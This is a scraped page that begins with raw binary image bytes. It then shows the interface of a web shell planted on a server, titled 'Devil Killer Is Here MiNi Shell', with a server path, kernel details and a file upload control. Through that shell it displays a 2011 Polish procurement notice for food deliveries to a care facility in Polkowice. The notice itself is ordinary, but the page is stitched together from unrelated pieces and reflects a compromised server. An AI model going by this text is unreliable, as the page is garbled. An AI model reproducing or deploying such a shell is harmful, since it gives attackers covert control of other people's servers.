JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111209/419180-N-2011.html

<p class="kh_header"><b>Polkowice: Dostawa żywności dla potrzeb zbiorowego żywienia osób przebywających w Placówce Socjalizacyjnej Skarbek w Polkowicach</b><br>
<b>Numer ogłoszenia: 419180 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Placówka Socjalizacyjna "SKARBEK" , ul. Browarna 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 7239664 (61, 62, 63), faks 076 7239664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psskarbek.za.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Placówka Socjalizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla potrzeb zbiorowego żywienia osób przebywających w Placówce Socjalizacyjnej Skarbek w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności dla potrzeb zbiorowego żywienia osób przebywających w Placówce socjalizacyjnej Skarbek w Polkowicach
Zamówienie obejmuje:
część I - artykuły spożywcze - CPV:15800000-6
część II - mięso i wędliny - CPV: 15100000-9
część III - produkty mleczarskie - CPV: 15500000-3
część IV - owoce i warzywa - CPV: 15300000-1
część V - pieczywo - CPV: 15810000-9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania wymaganych warunków będzie dokonana wg kryterium spełnia-nie spełnia, niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek wiedzy i doświadczenia, jeżeli wykaże że wykonał lub /i wykonuje obecnie co najmniej dwie dostawy podobne do tych, stanowiących przedmiot niniejszego zamówienia, tzn. odpowiadającymi swoim rodzajem dostawom stanowiącym przedmiot niniejszego zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania wymaganych warunków będzie dokonana wg kryterium spełnia-nie spełnia, niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania wymaganych warunków będzie dokonana wg kryterium spełnia-nie spełnia, niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania wymaganych warunków będzie dokonana wg kryterium spełnia-nie spełnia, niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (wg załączonego wzoru nr 1 ),
2) decyzja wystawiona dla Wykonawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) o spełnieniu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie artykułami żywnościowymi oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów;
3) dokument wystawiony dla Wykonawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP (dokument ten winien być wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert); - dotyczy zakładów produkujących lub wprowadzających żywność do obrotu, które zgodnie z obowiązującymi przepisami podlegają takiemu obowiązkowi; jeżeli z tytułu prowadzonej działalności wykonawca nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP przedstawi on stosowny dokument wystawiony dla producentów;
4) pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),
5) pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty),
6) zaparafowany projekt umowy,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy - w przypadku ustawowej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.psskarbek.za.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Placówka Socjalizacyjna Skarbek ul. Browarna 1, 59-100 Polkowice, pokój intendenta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2011 godzina 09:00, miejsce: Placówka Socjalizacyjna Skarbek ul. Browarna 1, 59-100 Polkowice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Budyń z cukrem typuWiniary lub równoważny różne smaki 60 g 150 szt
2 Fasola biała puszka 400 g 20 szt
3 Galaretka owocowa w proszku typu Winiary lub równoważna różne smaki 79 g 250 szt
4 Koncentrat pomidorowy typu Pudliszki lub równoważny 30procent 200g 100 szt
5 Konserwa mięsna 300 g tyrolska 40 szt
6 Konserwa mięsna 300 g gulasz angielski 40 szt
7 Wafle familijne typu Jutrzenka lub równoważne  180 g 30 szt
8 Sok owocowy typu Kubuś lub równoważny 0,4 l 200 szt
9 Ciastka markizy typu Pieguski lub równoważne 165 g 30 szt
10 Paluszki 70 g 200 szt
11 Sos boloński typu Winiar lub równoważny 46 g 40 szt
12 Sos pieczeniowy ciemny typu Winiar lub równoważny 30 g 60 szt
13 Sos myśliwski typu Winiar lub równoważny  34 g 40 szt
14 Sos pieczarkowy typu Winiar lub równoważny 34 g 30 szt
15 Chrupki kuleczki owocowe 80g 100 szt
16 Cukier kryształ 1 kg 260 kg
17 Spody do tortów 3-warstwowe jasne typu Delecta lub równoważne 420 g	10 szt
18 Herbatniki pod sernik typu Miś lub równoważne 100g 	40 szt
19 Jaja - klasa wagowa L	2000 szt
20 Makaron nitki  500 g 30 szt
21 Makaron świderki 500 g 60 szt
22 Makaron spagetti 500 g 50 szt
23 Makaron łazanka 500 g 30 szt
24 Makaron kolanka duże500 g 20 szt
25 Makaron kolanka małe 500 g 20 szt
26 Makaron muszelka duża 500 g 20 szt
27 Makaron muszelka mała 500 g 20 szt
28 Makaron zacierka 250 g 15 szt
29 Margaryna do kanapek 500 g 380 szt
30 Margaryna mleczna 250 g  w kostce 300 szt
31 Mąka tortowa 1 kg 300 kg
32 Mąka ziemniaczana 500 g 15 szt
33 Paprykarz szczeciński 180 g 60 szt
34 Sałatka rybna neptun typu Dega lub równoważna 135 g 40 szt
35 Pasztet prochowicki 160 g 150 szt
36 Płatki kukurydziane typu Nestle lub równoważne- 250 g. 100 szt
37 Płatki kukurydziane z miodem typu Nestle lub równoważne 250 g 60 szt
38 Płatki zbożowe czekoladowe typu Nestle lub równoważne 250 g 	60 szt
39 Herbata owocowa ekspresowa typu Saga lub równoważna (25 torebek) 40 szt
40 Herbata granulowana owocowa Ekoland lub równoważna 300 g 120 szt
41 Herbata expresowa zwykła typu Golden lub równoważna (100 torebek) 30 szt
42 Kisiel z cukrem różne smaki typu Winiar lub równoważny 77 g 200 szt
43 Musztarda stołowa typu Pegaz lub równoważna 200 g	 60 szt
44 Olej  rzepakowy 1l - z pierwszego tłoczenia 160 szt
45 Powidła śliwkowe typu Łowicz lub równoważne 350 g 40 szt
46 Płatki owsiane górskie błyskawiczne 500 g 12 szt
47 Płatki jęczmienne błyskawiczne 400 g 12 szt
48 Zupa żurek typu Winiar lub równoważna  49 g  torebka 70 szt
49 Zupa barszcz biały typu Winiar lub równoważna 66 g torebka 70 szt
50 Zupa fasolowa typu Winiar lub równoważna 65 g 50 szt
51 Chrupki kukurydziane 70 g 50 szt
52 Chrupki flips 70 g- różne smaki 100 szt
53 Cukierki owocowe nadziewane 1 kg	 15 kg
54 Drops owocowy 5 smaków 47 g 40 szt
55 Wafelki czekoladowe typu Grześki lub równoważne 39 g 100 szt
56 Szczaw siekany 300 ml 20 szt
57 Zupa instant błyskawiczna 69 g 120 szt
58 Sałatka obiadowa 0,9 l  20 szt
59 Dżem owocowy niskosłodzony typu Łowicz lub równoważny różne smaki 280 g 90 szt
60 Miód wielokwiatowy 380 g 10 szt
61 Kakao granulowane słodkie typu Puchatek lub równoważne 300 g 70 szt
62 Kakao naturalne 100 g 10 szt
63 Kawa inka  kartonik 150 g	 12 szt
64 Kasza manna błyskawiczna 500 g 20 szt
65 Kasza jęczmienna gruba 500 g 25 szt
66 Kasza gryczana  500 g 20 szt
67 Ryż biały długoziarnisty1 kg 60 kg
68 Płatki ryżowe błyskawiczne  250 g 20 szt
69 Patisony konserwowe 0,9 l 10 szt
70 Bulion drobiowy w kostkach typu Winiar lub równoważne (12 kostek) 30 szt
71 Syrop owocowy różne smaki 500 ml 120 szt
72 Zaprawa cytrynowa 500 g 20 szt
73 Bułka tarta 500 g 40 szt
74 Filet z morszczuka płaty 1 kg SHP 30 kg
75 Groszek konserwowy 400 g 30 szt
76 Kukurydza konserwowa 400 g 40 szt
77 Mieszanka 3 skł. 0,5 l typu Pudliszki lub równoważna 20 szt
78 Ketchup łagodny typu Tortex lub równoważny 500 g 70 szt
79 Przyprawa Maggi Winiary lub równoważna 1 l	10 szt
80 Przyprawa typu Kucharek lub równoważna 1 kg 25 kg
81 Majonez typu Winiary 250 ml lub równoważny 20 szt
82 Majonez typu Winiary 400 ml lub równoważny 30 szt
83 Majonez typu Winiary 700 ml lub równoważny 10 szt
84 Krem chrzanowy 200 ml 4 szt
85 groch łuskany połówki  500 g 20 szt
86 Fasola biała Jaś 400g 40 szt
87 Rogal z czekoladą typu Croissant lub równoważny 60 g 200 szt
88 Cukier puder 400 g 10 szt
89 Cukier waniliowy 16 g 60 szt
90 Proszek do pieczenia 18 g 20 szt
91 Kwasek cytrynowy 20 g 20 szt
92 Pieprz czarny mielony 20 g 50 szt
93 Pieprz ziołowy mielony 20 g 15 szt
94 Przyprawa tzatziki 20 g 15 szt
95 Czosnek granulowany 20 g 50 szt
96 Papryka słodka 15 g 10 szt
97 Papryka ostra 15 g 10 szt
98 Przyprawa do grilla 20 g 20 szt
99 Przyprawa do kurczaka 20 g 30 szt
100 Przyprawa do ryb 20g 10 szt
101 Majeranek 10 g 10 szt
102 Sól jodowana 1 kg 30 kg
103 Bazylia 7 g 5 szt
104 Oregano 7 g 5 szt
105 Wiórki kokosowe 100 g 10 szt
106 Rodzynka 100 g 5 szt
107 Goździki suszone 100 g 2 szt
108 Soda oczyszczona 70 g	5 szt
109 Ryba matjas solony 5 kg
110 Ryba mintaj płaty  SHP 30 kg
111 Paluszki rybne panierowane 1 kg 10 kg
112 Konserwa rybna-filet w oleju170g 	30 szt
113 Konserwa rybna-filet w pomidorach 170 g 30 szt
114 Ogórek konserwowy 0,9 l 80 szt
115 Krem czekoladowy do smarowania pieczywa typu Nutella lub równoważny 200g,40 szt
116 Koncentrat barszczu (butelka 330 ml) 5 szt
117 Zupa barszcz czerwony w torebce typu Winiar lub równoważny 49 g 5 szt
118 Ananas w puszce 565 g, po odcieku 340 g  	6 szt
119 Brzoskwinia w puszce 850 g, bez zalewy 460 g 10 szt
120 Wafle domowe-andrut suchy 20 szt
121 Draże owocowe 70 g 20 szt
122 Czekolada mleczna 100 g 20 szt
123 Czekolada mleczna nadziewana 100 g 20 szt
124 Ciastka  typu Delicje paczkowane lub równoważne 150 g 20 szt
125 Sok owocowy w kartonie typu Hortex (różne smaki) lub równoważny 1 l	20 szt
126 Sok multiwitamina w kartonie typu Hortex lub równoważny 1 l 20 szt
127 Kompot owocowy( różne smaki) 0,9 l 50 szt
128 Bita śmietana w proszku 60 g 5 szt
129 Cynamon mielony  20 g 5 szt
130 Woda mineralna niegazowana 1,5 l typu Primawera lub równoważna 120 szt
131 Woda mineralna niegazowana 0,5 l typu Primawera lub równoważna 50 szt
132 Wafelek orzechowy typu Princessa lub równoważny 37 g 30 szt
133 Lody różne smaki  200 ml 60 szt
134 Posypka owocowa 50 g 5 szt
135 Mleko w proszku 500 g 5 szt
136 Krem do ciast czekoladowy typu Delecta lub równoważny 100 g 10 szt
137 Krem do ciast waniliowy typu Maspex lub równoważny 120 g 10 szt
138 Ser topiony kostka śmietankowy typu Lactima  lub równoważny 100 g 50 szt
139 Kapusta czerwona-sałatka 890 g 30 szt
140 Papryka konserwowa 820 g 15 szt
141 Popcorn 100 g 20 szt
142 Ćwikła z chrzanem 300g 4 szt
143 Chrzan 160 g 5 szt
144 Lizak kulisty 8 g 50 szt
145 Kleik ryżowy błysk. 170 g 4 szt
146 Masło exstra 250 g 4 szt
147 Drożdże piek.0,1 kg 1,20 kg
148 Kisiel błyskawiczny typu Emix lub równoważny, różne smaki 31,5 g 50 szt
149 Budyń błyskawiczny typu Emix lub równoważny, różne smaki 41 g 50 szt
150 Baranek czekoladowy 50 g 4 szt
151 Babeczka wielkanocna 10-20 g 10 szt
152 Baton nadziewany Pawełek lub równoważny 45 g 50 szt
153 Liść laurowy 8 g 10 szt
154 Ziele angielskie 15 g 10 szt
155 Przyprawa gyros 30 g 10 szt
156 Zupa borowikowa typu Winiar lub równoważna 45 g torebka 20 szt
157 Zupa grzybowa typu Winiar lub równoważna 66 g torebka 20 szt
158 Masa makowa z bakaliami puszka 850 g 2 szt
159 Herbata melisa owocowa ekspressowa (20 torebek )	10 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Kiełbasa śląska wieprzowa	60 kg
2 Boczek wędzony	5 kg
3 Szynka konserwowa 15 kg
4 Szynka wieprzowa 5 kg
5 Mortadela wieprzowa 15 kg
6 Ogonówka wieprzowa 12 kg
7 Parówka cienka wieprzowa	30 kg
8 Kiełbasa podsuszana drobiowa 15 kg
9 Kiełbasa żywiecka wieprzowa 10 kg
10 Polędwica królewska 5 kg
11 Szynka sopocka	13 kg
12 Polędwica drobiowa 8 kg
13 Pasztet drobiowy 15 kg
14 Pasztet wieprzowy 13 kg
15 Szynka złocista	5 kg
16 Mielonka wieprzowa 40 kg
17 Kiełbasa podwawelska wieprz. 14 kg
18 Kiełbasa zwyczajna 50 kg
19 Filecik opiekany	20 kg
20 Kiełbasa szynkowa wieprz. 10 kg
21 Lunchmeat królewski 15 kg
22 Kiełbasa polska wędzona 5 kg
23 Kiełbasa krakowska sucha	7 kg
24 Serdelki wieprzowe 10 kg
25 Kabanos dębowy 2 kg
26 Kiełbasa biała surowa 5 kg

Mięso	
1 Mięso stekowe wieprzowe	15 kg
2 Mięso mielone wieprz-wołowe 50 kg
3 Kości wędzone 20 kg
4 Kości wieprzowe	40 kg
